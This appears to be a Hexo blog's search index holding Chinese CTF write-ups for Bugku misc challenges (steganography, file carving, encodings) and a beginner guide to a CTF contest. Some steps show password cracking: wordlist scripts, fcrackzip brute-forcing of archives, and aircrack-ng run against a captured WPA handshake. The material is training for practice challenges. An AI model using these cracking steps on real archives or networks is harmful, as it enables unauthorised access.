-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
1205 lines (1089 loc) · 309 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Bugku CTF 杂项</title>
<url>/2020/03/30/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/</url>
<content><![CDATA[<h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h2><p>扫描二维码,关注Bugku微信公众号,在公众号里输入“flag”即得到flag。</p>
<h2 id="这是一张单纯的图片"><a href="#这是一张单纯的图片" class="headerlink" title="这是一张单纯的图片"></a>这是一张单纯的图片</h2><p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330224134844.png" alt="image-20200330224134844"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&#125;</span><br></pre></td></tr></table></figure>
<p>解码平台</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://tool.chinaz.com/tools/htmlencode.aspx</span><br></pre></td></tr></table></figure>
<p>HtmlDecode解码后</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">key{you are right}</span><br></pre></td></tr></table></figure>
<h2 id="隐写"><a href="#隐写" class="headerlink" title="隐写"></a>隐写</h2><blockquote>
<h3 id="png格式"><a href="#png格式" class="headerlink" title="png格式"></a>png格式</h3><p>png格式主要由六大块组成:<strong>文件头</strong>、<strong>HDR块</strong>、<strong>PLTE块</strong>、<strong>tRNS块</strong>、<strong>IDAT块</strong>、<strong>文件尾</strong></p>
<p>文件头一般是89 50 4E 47 0D 0A 1A 0A</p>
<p>HDR块是png中用来描述图片的基本信息,格式是4字节 Chunk_Length、4字节 Chunk_Type、13字节 Chunk_data、4字节 Chunk_crc</p>
<p><strong>Chunk Length</strong>: 内容一般是13,决定了 Chunk_Data的大小</p>
<p><strong>Chunk_Type</strong>: 内容为49 48 44 52,代表”HDR”</p>
<p><strong>Chunk Data</strong>: 4字节width,4字节 Heigh,1字节 BitDepth,1字节 ColorType,1字节 Compression Method,1字节 FilterMethod,1字节 Interlace Method</p>
<p><strong>Chunk CRC</strong>: 把 Chunk_Type和 Chunk_Data合起来进行CRC校验</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330224016283.png" alt="image-20200330224016283"></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330225635486.png" alt="image-20200330225635486"></p>
<p>PNG标识符 89 50 4E 47 0D 0A 1A 0A</p>
<p>IHDR头块长为13 00 00 00 0D </p>
<p>IHDR标识 49 48 44 52 </p>
<p>图像的宽 00 00 01 F4 (500像素)</p>
<p>图像的高 00 00 01 A4 (420像素)</p>
<p>CRC校验 CB D6 DF 8A</p>
<h3 id="CRC循环冗余校验"><a href="#CRC循环冗余校验" class="headerlink" title="CRC循环冗余校验"></a>CRC循环冗余校验</h3><p><video src="/video/[CRC校验]手算与直观演示.mp4" controls="controls" style="max-width: 100%; display: block; margin-left: auto; margin-right: auto;"> your browser does not support the video tag </video></p>
</blockquote>
<p>解题:原图片的高度被更改了,IHDR文件头数据块,更改高度,把“A4”改成“F4”,保存,就可以看到被隐藏的flag<br><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/F9kxb7Y.png" alt="img"></p>
<p>修改成功</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Eao2ZCH.png" alt="img"></p>
<p><code>BUGKU{a1e5aSA}</code></p>
<h2 id="telnet"><a href="#telnet" class="headerlink" title="telnet"></a>telnet</h2><p>题目地址<a href="http://120.24.86.145:8002/misc/telnet/1.zip">http://120.24.86.145:8002/misc/telnet/1.zip</a></p>
<p>wireshark打开,查看tcp数据流</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/DtuESFV-1585581117817.png" alt="img"></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/r0xMz6X-1585581133752.png" alt="img"></p>
<p>得到flag{d316759c281bf925d600be698a4973d5}</p>
<h2 id="眼见非实-ISCCCTF"><a href="#眼见非实-ISCCCTF" class="headerlink" title="眼见非实(ISCCCTF)"></a>眼见非实(ISCCCTF)</h2><p>题目地址<a href="http://ctf.bugku.com/files/919ee4ea1658c3e3ef8b59b67f298470/zip">http://ctf.bugku.com/files/919ee4ea1658c3e3ef8b59b67f298470/zip</a></p>
<p>下载得到一个名为 zip 的文件,根据文件名的提示,给它加 .zip 的后缀</p>
<p>果然成功打开,打开后发现<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/ftqSTAK.png" alt="img"></p>
<p>解压后发现文件错误,本着试一试的原则,后缀名改成 .zip<br>结果还真能打开,压缩包里是<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/yc7K9hi.png" alt="img"><br>查看文件,最终在 <em>眼见非实.zip\眼见非实\word\document.xml</em> 这个文件中找到flag<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/yiz4PTU.png" alt="img"></p>
<p>flag{F1@g}</p>
<h3 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>技巧</h3><p>文件这么多怎么找呢?可以用everything的高级搜索,搜索文件内容</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330232303214.png" alt="image-20200330232303214"></p>
<h2 id="啊哒"><a href="#啊哒" class="headerlink" title="啊哒"></a>啊哒</h2><blockquote>
<p><a href="https://blog.csdn.net/wxh0000mm/article/details/85683661">Binwalk工具的详细使用说明</a></p>
</blockquote>
<p>用binwalk打开图片发现里面有zip文件</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330235921186.png" alt="image-20200330235921186"></p>
<p>利用dd命令分割一下<code>dd if=ada.jpg of=adazip skip=218773 bs=1</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331000426142.png" alt="image-20200331000426142"></p>
<blockquote>
<h3 id="linux中dd命令详解"><a href="#linux中dd命令详解" class="headerlink" title="linux中dd命令详解"></a>linux中dd命令详解</h3><p>dd:用指定大小的块拷贝一个文件,并在拷贝的同时进行指定的转换。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1.if=文件名:输入文件名,缺省为标准输入。即指定源文件。< if=input file ></span><br><span class="line">2.of=文件名:输出文件名,缺省为标准输出。即指定目的文件。< of=output file ></span><br><span class="line">3.skip=blocks:从输入文件开头跳过blocks个块后再开始复制。</span><br><span class="line">4.bs=bytes:同时设置读入/输出的块大小为bytes个字节。</span><br></pre></td></tr></table></figure>
</blockquote>
<p>提取出来的压缩包需要密码,只能在图片本身找线索了</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331001042071.png" alt="image-20200331001042071"></p>
<p>注意到属性有一个莫名其妙的16进制的参数<code>73646E6973635F32303138</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331001235941.png" alt="image-20200331001235941"></p>
<p>尝试转化为ASCII,结果为<code>sdnisc_2018</code>,此为压缩包密码</p>
<p><a href="http://www.ab126.com/goju/1711.html">ASCII 在线转换器</a></p>
<p>将zip解压,输入刚才的密码得到flag<code>flag{3XiF_iNf0rM@ti0n}</code></p>
<h2 id="又一张图片,还单纯吗"><a href="#又一张图片,还单纯吗" class="headerlink" title="又一张图片,还单纯吗"></a>又一张图片,还单纯吗</h2><p>保存图片,直接扔 binwalk 里,发现里面包含两个图片,一个jpg格式,一个tiff格式</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331004443767.png" alt="image-20200331004443767"></p>
<p>foremost分离文件<code>foremost 2.jpg</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331004859305.png" alt="image-20200331004859305"></p>
<p>得到flag<code>falg{NSCTF_e6532a34928a3d1dadd0b049d5a3cc57}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331005016003.png" alt="image-20200331005016003"></p>
<blockquote>
<h3 id="foremost使用简介"><a href="#foremost使用简介" class="headerlink" title="foremost使用简介"></a>foremost使用简介</h3><p>安装:<a href="http://foremost.sourceforge.net/">Foremost官网</a></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">LINUX:</span><br><span class="line"><span class="meta">$ </span><span class="language-bash">tar zxvf foremost-xx.tar.gz</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash"><span class="built_in">cd</span> foremost-xx</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">make</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">make install</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h2 id="猜"><a href="#猜" class="headerlink" title="猜"></a>猜</h2><p>题目提示flag是某人名字全拼</p>
<p>图片又是一张不全的照片<br>直接百度识图,搜到原图<br><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/wnxCabR.png" alt="img"></p>
<p>得到flag<code>key{liuyifei}</code></p>
<h2 id="宽带信息泄露"><a href="#宽带信息泄露" class="headerlink" title="宽带信息泄露"></a>宽带信息泄露</h2><p>下载得到一个二进制文件,上网搜索得知需要用RouterPassView这个软件打开,题目提示flag为宽带用户名,则在里面查找user,找到username。<code>flag{053700357621}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/tGrk6jY.png" alt="img"></p>
<h2 id="隐写2"><a href="#隐写2" class="headerlink" title="隐写2"></a>隐写2</h2><p>把这张傻子图扔到binwalk上</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331015629229.png" alt="image-20200331015629229"></p>
<p>foremost分开,有一个压缩包,里面有一个加密的压缩包和一张图片</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/E1VlWV1.png" alt="img"></p>
<p>分析提示,三个数,一个国王,一个女神,一个骑士,又说斗地主……那不就….还是直接暴力破解吧</p>
<p>先做个字典000~999,写了个垃圾的py(但是能用啊)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">filename = <span class="string">"num.txt"</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"> <span class="keyword">for</span> y <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"> <span class="keyword">for</span> z <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">"a"</span>) <span class="keyword">as</span> file_obj:</span><br><span class="line"> file_obj.write(<span class="built_in">str</span>(x)+<span class="built_in">str</span>(y)+<span class="built_in">str</span>(z)+<span class="string">'\n'</span>)</span><br><span class="line">file_obj.close()</span><br></pre></td></tr></table></figure>
<p>暴力破解,试了好多,终于找到一个速度快又好用的工具[Advanced Archive Password Recovery](<a href="http://dl-t1.wmzhe.com/15/15056/Advanced">http://dl-t1.wmzhe.com/15/15056/Advanced</a> Archive Password Recovery 4.54.exe)</p>
<p>密码871</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/TBEoJSQ.png" alt="img"></p>
<blockquote>
<h3 id="Fcrackzip"><a href="#Fcrackzip" class="headerlink" title="Fcrackzip"></a>Fcrackzip</h3><p>kali下可以用Fcrackzip破解压缩文件密码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get install fcrackzip</span><br><span class="line">fcrackzip -b -l 3 -c '1' -u flag.rar</span><br><span class="line"></span><br><span class="line">-b 暴力破解</span><br><span class="line">>-l 指定密码长度</span><br><span class="line">-c 指定密码类型('a'为字母 '1'为数字 '!'为特殊字符)</span><br><span class="line">>-u 压缩包名字</span><br></pre></td></tr></table></figure>
</blockquote>
<p>拿到图片,winhex打开,在底部发现base64编码的flag</p>
<p><code>f1@g{eTB1IEFyZSBhIGhAY2tlciE=}</code></p>
<p>base64解密得到y0u Are a h@cker!</p>
<p>最后输入<code>fl@g{y0u Are a h@cker!}</code></p>
<blockquote>
<p><a href="https://www.liaoxuefeng.com/wiki/897692888725344/949441536192576">base64</a>是一种用64个字符来表示任意二进制数据的方法</p>
</blockquote>
<h2 id="多种方法解决"><a href="#多种方法解决" class="headerlink" title="多种方法解决"></a>多种方法解决</h2><p>得到一个</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/jxex9qD.png" alt="img"></p>
<p>打不开,后缀改成 .txt 打开是提示图片格式和一长串 base64</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331022803401.png" alt="image-20200331022803401"></p>
<p>那就base64转图片解密</p>
<p>得到一张二维码</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Xsi5dud.png" alt="img"></p>
<p>识别后得到<code>KEY{dca57f966e4e4e31fd5b15417da63269}</code></p>
<h2 id="闪的好快"><a href="#闪的好快" class="headerlink" title="闪的好快"></a>闪的好快</h2><p>这是一道二维码的题目。保存图片祭出神器StegSolve。然后Analysis->Frame Browser。这里发现是18张图。也就是18张图片。</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331023254916.png" alt="image-20200331023254916"></p>
<p>一个挨着一个扫的。<br>扫出来的结果是<code>SYC{F1aSh_so_f4sT}</code></p>
<h2 id="白哥的鸽子"><a href="#白哥的鸽子" class="headerlink" title="白哥的鸽子"></a>白哥的鸽子</h2><p>先丢到binwalk分析,有个小东西,用foremost没分离出什么文件</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024321707.png" alt="image-20200331024321707"></p>
<p>拿到Winhex看看</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024505111.png" alt="image-20200331024505111"></p>
<p>结尾处出现规律字符,有flag字符出现<code>fg2ivyo}l{2s3_o@aw__rcl@</code></p>
<p>推测栅栏密码,拿去解密。平台:<a href="https://www.qqxiuzi.cn/bianma/zhalanmima.php">栅栏密码加密解密</a></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024804075.png" alt="image-20200331024804075"></p>
<p>结果<code>flag{w22_is_v3ry_cool}</code></p>
<blockquote>
<h3 id="栅栏密码"><a href="#栅栏密码" class="headerlink" title="栅栏密码"></a>栅栏密码</h3><p> 栅栏密码是一种简单的移动字符位置的加密方法,规则简单,容易破解。栅栏密码的加密方式:把文本按照一定的字数分成多个组,取每组第一个字连起来得到密文1,再取每组第二个字连起来得到密文2……最后把密文1、密文2……连成整段密文。例如:</p>
<p>明文:栅栏密码加密规则示例<br>每组字数:5</p>
<p>按照字数先把明文分成:<br>栅栏密码加<br>密规则示例</p>
<p>先取每组第一个字:栅密<br>再取每组第二个字:栏规<br>……</p>
<p>最后得到“栅密栏规密则码示加例”。</p>
<p>解密则反推:<br>密文被分成2个字一组:<br>栅密<br>栏规<br>密则<br>码示<br>加例</p>
<p>先取每组第一个字:栅栏密码加<br>再取每组第二个字:密规则示例</p>
<p>最后得到“栅栏密码加密规则示例”。</p>
</blockquote>
<h2 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h2><p>不知道这道题怎么出的,解压,直接notepad++查看文件搜索 key 就得到key{feb81d3834e2423c9903f4755464060b}</p>
<h2 id="隐写3"><a href="#隐写3" class="headerlink" title="隐写3"></a>隐写3</h2><p>下载到一个压缩包,解压的到一个png文件</p>
<p>首先用tweakpng分析,提示CRC不对,不出意外应该是在宽或者高上做了手脚</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331121703005.png" alt="image-20200331121703005"></p>
<p>Winhex打开,随便在高上改了一个比较大的数字</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331121905992.png" alt="image-20200331121905992"></p>
<p>Windows画图工具打开,得到flag<code>flag{He1l0_d4_ba1}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331122051534.png" alt="image-20200331122051534"></p>
<h2 id="做个游戏-08067CTF"><a href="#做个游戏-08067CTF" class="headerlink" title="做个游戏(08067CTF)"></a>做个游戏(08067CTF)</h2><h2 id="想蹭网先解开密码"><a href="#想蹭网先解开密码" class="headerlink" title="想蹭网先解开密码"></a>想蹭网先解开密码</h2><p>文件是.cap,扔到wireshark里看一下,基本上都是802.11协议的包,WiFi认证过程重点在WPA的四次握手包,也就是eapol协议的包,过滤一下<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/uhxthkv.png" alt="img"></p>
<p>aircrack-ng 进行破解<br>先生成字典</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">filename = "num.txt"</span><br><span class="line">for x in range(10):</span><br><span class="line"> for y in range(10):</span><br><span class="line"> for z in range(10):</span><br><span class="line"> for n in range(10):</span><br><span class="line"> with open(filename, "a") as file_obj:</span><br><span class="line"> file_obj.write('1391040'+str(x)+str(y)+str(z)+str(n)+'\n')</span><br><span class="line">file_obj.close()</span><br></pre></td></tr></table></figure>
<p><code>aircrack-ng -w num.txt wifi.cap</code>开始破解</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Qk5Eju4.png" alt="img"></p>
<blockquote>
<p>Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具</p>
<p>WEP and WPA-PSK cracking options:</p>
<pre><code> -w <words> : path to wordlist(s) filename(s)
</code></pre>
</blockquote>
<p><code>flag{13910407686}</code></p>
<h2 id="Linux2"><a href="#Linux2" class="headerlink" title="Linux2"></a>Linux2</h2><p>又是linux,以bugku一贯的niaoxing,Winhex搜索key然后……然后就找到了….</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331135657164.png" alt="image-20200331135657164"></p>
<p><code>KEY{24f3627a86fc740a7f36ee2c7a1c124a} </code></p>
<h2 id="账号被盗了"><a href="#账号被盗了" class="headerlink" title="账号被盗了"></a>账号被盗了</h2><h2 id="细心的大象"><a href="#细心的大象" class="headerlink" title="细心的大象"></a>细心的大象</h2><p>压缩包里有一张图片,扔到binwalk上发现<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/IZS9cP8.png" alt="img"></p>
<p>分离后是一个压缩包,里面有第二张图片但是需要密码,<br>查看了下图片1的属性,果然找到了备注一串字符<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/ZsNBoQG.png" alt="img"><br>一看就是经过base64加密的,拿去解密后就是图片2的密码</p>
<p>用winhex打开将标记的A4修改为F4<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/3O78QAI.png" alt="img"></p>
<p>打开就会发现flag<code>BUGKU{a1e5aSA}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/1OFwGmJ.png" alt="img"></p>
<p>卧槽,这题做过???flag都一样。。。</p>
<h2 id="爆照-08067CTF"><a href="#爆照-08067CTF" class="headerlink" title="爆照(08067CTF)"></a>爆照(08067CTF)</h2><p>一张穹妹的图片,binwalk扫一下后<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/36H9LAD.png" alt="img"></p>
<p>分离后得到一个压缩包</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/nL6gEd7.png" alt="img"></p>
<p>将这些文件一个一个binwalk,发现有三个文件是被修改的图片</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/20180607165234150.png" alt="img"></p>
<p>88->(扫描)->bilibili</p>
<p>888->(右键属性)->(c2lsaXNpbGk=)base64解码->silisili</p>
<p>8888里面还有一个zip压缩包,修改后缀为zip,解压得到一个二维码->扫描->panama</p>
<p>而且flag的格式是flag{xxx_xxx_xxx},gif提示排序,那就按顺序排在一起,使用”_”隔开,得到flag<br><code>flag{bilibili_silisili_panama}</code></p>
<h2 id="妹子的陌陌"><a href="#妹子的陌陌" class="headerlink" title="妹子的陌陌"></a>妹子的陌陌</h2><p>下载后是一张照片binwalk发现有压缩包,改后缀.zip打开有一个.txt文件,需要密码解压,图片上有<code>喜欢我吗.</code>五个字符,密码就是这个</p>
<p>解压后得到<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/fQDcyNX.png" alt="img"></p>
<p>解密第一个摩斯密码得到HTTP//ENCODE.CHAHUO.COM/<br>构造成url<br><a href="http://encode.chahuo.com/">HTTP://ENCODE.CHAHUO.COM/</a></p>
<p>在这个网站中选择AES解密U2FsdGVkX18tl8Yi7FaGiv6jK1SBxKD30eYb52onYe0=</p>
<p>得到momoj2j.png</p>
<p>访问<br><a href="http://c.bugku.com/momoj2j.png">http://c.bugku.com/momoj2j.png</a></p>
<p>得到二维码,扫描后得到flag,要是扫不出来就将图片反相做一下再扫</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="%5Bhttps://www.abelche.com/2018/08/26/Writeup/WP-Bugku-%E6%9D%82%E9%A1%B9%E7%B3%BB%E5%88%97/%5D(https://www.abelche.com/2018/08/26/Writeup/WP-Bugku-%E6%9D%82%E9%A1%B9%E7%B3%BB%E5%88%97/)">WP-Bugku-杂项系列</a></p>
<p><a href="https://blog.csdn.net/qq_39629343/article/details/80611614">bugku - 杂项(misc)部分 writeup</a></p>
]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>杂项</tag>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>【景衡杯】2020极客先锋杯入门指导</title>
<url>/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E5%85%A5%E9%97%A8%E6%8C%87%E5%AF%BC/</url>
<content><![CDATA[<p><a href="#web">Web入门传送门</a><br><a href="#crypto">Crypto 密码学 入门传送门</a><br><a href="#misc">Misc 杂项 入门传送门</a><br><a href="#catch_flag">萌新入门刷题传送门</a></p>
<h2 id="1-web的详细入门指导"><a href="#1-web的详细入门指导" class="headerlink" title="1.web的详细入门指导"></a><a id="web">1.web的详细入门指导</a></h2><p>首先,大略过一下最基础的语言语法HTML/CSS、JavaScript、PHP的基本知识(平均一个语言4小时足矣),要做到看到这些代码的时候不会畏惧,能看懂大部分,看到不懂的能通过google或者相关文档查懂。主要参考:<a href="http://www.w3school.com.cn/">http://www.w3school.com.cn/</a> 、<a href="http://www.runoob.com/">http://www.runoob.com/</a> , 这里不要求学很深,很浅很浅就行,后面边学边用掌握的会更快。</p>
<p>现在,你初步了解了一些语言知识,接下来你就需要开始在实践中学习与巩固。</p>
<p>如果你能完成如上所说的这些,那么恭喜你,你入门了,其实这些前期会遇到很多语言方面难免会遇到挫折,但是没关系,多百度多谷歌,多群里提问,我们都会及时给你解答。</p>
<ul>
<li><p>接下来可以了解基本的HTTP协议相关知识</p>
<ul>
<li>掌握HTTP请求:GET、POST、HEAD,能基本读懂一个HTTP数据包,了解GET、POST、HEAD的区别</li>
<li>能看懂HTTP响应包 404 403 200 500 302 301 …</li>
<li>了解Cookie、session、token,知道是什么东西,作用是什么,为什么需要这些东西</li>
<li>了解Referer、X-Forwarded-For等等的作用</li>
</ul>
</li>
<li><p>学漏洞知识点之前,如果你了解了如上所说的一些东西,那么就可以学习下面的知识(进阶)啦,当然能学懂上面的知识可能需要大概3周左右的时间,多坚持,多提问。</p>
<p>sql注入</p>
<p>XSS攻击</p>
<p>文件上传漏洞</p>
<p>文件包含漏洞</p>
<p>命令执行漏洞</p>
<p>。。。</p>
</li>
</ul>
<p>推荐一些学习站点<br><a href="https://ctf-wiki.github.io/ctf-wiki/%3E">https://ctf-wiki.github.io/ctf-wiki/%3E</a> <a href="https://xz.aliyun.com/">https://xz.aliyun.com/</a> <a href="https://www.anquanke.com/">https://www.anquanke.com/</a> <a href="https://github.com/CHYbeta/Web-Security-Learning">https://github.com/CHYbeta/Web-Security-Learning</a></p>
<p>推荐一些题库<br><a href="https://cgctf.nuptsast.com/login">https://cgctf.nuptsast.com/login</a> <a href="https://www.jarvisoj.com/login">https://www.jarvisoj.com/login</a></p>
<p>推荐一些大牛的博客<br><a href="https://chybeta.github.io/">https://chybeta.github.io/</a> <a href="https://www.jianshu.com/u/bf30f18c872c">https://www.jianshu.com/u/bf30f18c872c</a> <a href="https://skysec.top/">https://skysec.top/</a> <a href="https://lorexxar.cn/">https://lorexxar.cn/</a></p>
<p>推荐书籍<br>《白帽子讲web安全》 《黑客攻防技术宝典·Web实战篇》</p>
<h2 id="2-Crypto的详细入门指导"><a href="#2-Crypto的详细入门指导" class="headerlink" title="2.Crypto的详细入门指导"></a><a id="crypto">2.Crypto的详细入门指导</a></h2><p>密码学需要较强的数学基础。ctf wiki也是入门不错的选择。 了解各种密码的实现过程,相关的攻击方法。 各种密码推荐直接到英文维基学习,讲的十分详细,一般也会有源代码。 上来学习密码学可以抄脚本,不用太关心其数学原理。等深入了解后再详细研究。</p>
<p>古典密码——脑洞大开的密码:链接 RSA攻击汇总:<a href="https://xz.aliyun.com/t/2446#toc-32">https://xz.aliyun.com/t/2446#toc-32</a> RSAcoppersmiths攻击:<a href="https://github.com/mimoo/RSA-and-LLL-attacks">https://github.com/mimoo/RSA-and-LLL-attacks</a></p>
